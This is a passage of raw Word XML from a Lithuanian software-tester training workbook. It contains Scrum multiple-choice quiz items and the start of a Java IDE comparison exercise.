      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1338" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId91" w:name="DefaultOcxName1151" w:shapeid="_x0000_i1338"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Vieną kartą, projekto pabaigoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1340" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId92" w:name="DefaultOcxName31111" w:shapeid="_x0000_i1340"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kiekvieno sprinto metu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1342" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId93" w:name="DefaultOcxName3111" w:shapeid="_x0000_i1342"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kiekvieno kodo atnaujinimo ciklo (angl. release cycle) metu</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color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3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Ą SCRUM KOMANDA TURĖTŲ PADARYTI PIRMO SPRINTO METU?</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(galimi keli teisingi atsakymai)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1344" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId94" w:name="DefaultOcxName31112" w:shapeid="_x0000_i1344"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Testuoti produktą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1346" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId95" w:name="DefaultOcxName31113" w:shapeid="_x0000_i1346"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sukurti detalų projekto planą </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1348" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId96" w:name="DefaultOcxName31114" w:shapeid="_x0000_i1348"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Užfiksuoti produkto architektūrą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1350" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId97" w:name="DefaultOcxName31115" w:shapeid="_x0000_i1350"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Sukurti nedidelį gabaliuką veikiančio funkcionalumo (angl. potentially shippable functionality)</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color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4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 xml:space="preserve">ĮMONĖS VADOVAS PAPRAŠO KOMANDOS NARIO ATLIKTI DARBĄ, KURIS NEĮEINA Į VYKSTANČIO SPRINTO NUMATYTĄ APIMTĮ. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00850D0A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ką tokiu atveju turėtų daryti komandos narys?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1352" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId98" w:name="DefaultOcxName20" w:shapeid="_x0000_i1352"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Pridėti jį prie sekančio sprinto darbų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1354" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId99" w:name="DefaultOcxName19" w:shapeid="_x0000_i1354"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Pridėti jį prie vykstančio sprinto darbų pakeičiant juo dalį jau prisiimto analogiškos apimties darbo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1356" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId100" w:name="DefaultOcxName341" w:shapeid="_x0000_i1356"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Informuoti Produkto savininką, kad jis galėtų aptarti tai su įmonės vadovu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1358" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId101" w:name="DefaultOcxName34" w:shapeid="_x0000_i1358"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Pridėti jį prie vykstančio sprinto darbų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KADA SPRINTO VYKDYMAS BAIGIAMAS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1360" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId102" w:name="DefaultOcxName59" w:shapeid="_x0000_i1360"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kai baigiamos visos užduotys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1362" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId103" w:name="DefaultOcxName110" w:shapeid="_x0000_i1362"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kai visos prisiimtų užduočių (all committed product backlog items) rezultatai atitinka baigtumo kriterijus (meet their definition of done)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1364" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId104" w:name="DefaultOcxName221" w:shapeid="_x0000_i1364"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Priklauso nuo situacijos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1366" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId105" w:name="DefaultOcxName36" w:shapeid="_x0000_i1366"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kai baigiasi sprintui skirtas laikas (time-box expires)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc13095538"/>
      <w:bookmarkStart w:id="220" w:name="_Toc13833432"/>
      <w:bookmarkStart w:id="221" w:name="_Toc14392463"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3. Kompetencija. Valdyti savo paties ir komandos atliekamą programinio kodo kūrimą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B950DC" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc1790679529"/>
      <w:bookmarkStart w:id="223" w:name="_Toc10443990"/>
      <w:bookmarkStart w:id="224" w:name="_Toc13095539"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="225" w:name="_Toc13833433"/>
      <w:bookmarkStart w:id="226" w:name="_Toc14392464"/>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Diegti ir valdyti programavimo darbo aplinką.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
      <w:bookmarkEnd w:id="224"/>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007F0ADF" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kadangi Programinės įrangos testuotojo programoje supažindiname su Java pagrindais, šiame modulyje užduotys bus susijusios su programavimu Java. Jei žinote ir norite naudoti kitą programavimo kalbą, galite naudoti ją ir jai tinkamas aplinkas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽRAŠYKITE PENKIAS INTEGRUOTAS KŪRIMO APLINKAS (IDE), KURIOS GALI BŪTI NAUDOJAMOS PROGRAMUOJANT JAVA AR KITA ŽINOMA KALBA</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽPILDYKITE PATEIKTĄ LENTELĘ (IDE PALYGINIMAS PAGAL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotį</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9456" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="817"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="1449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="996"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>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IDE (version)</w:t>
            </w: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Syntax highlighting</w:t>
            </w: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Code Completion</w:t>
            </w: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Refactoring</w:t>
            </w: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Version control</w:t>
            </w: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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
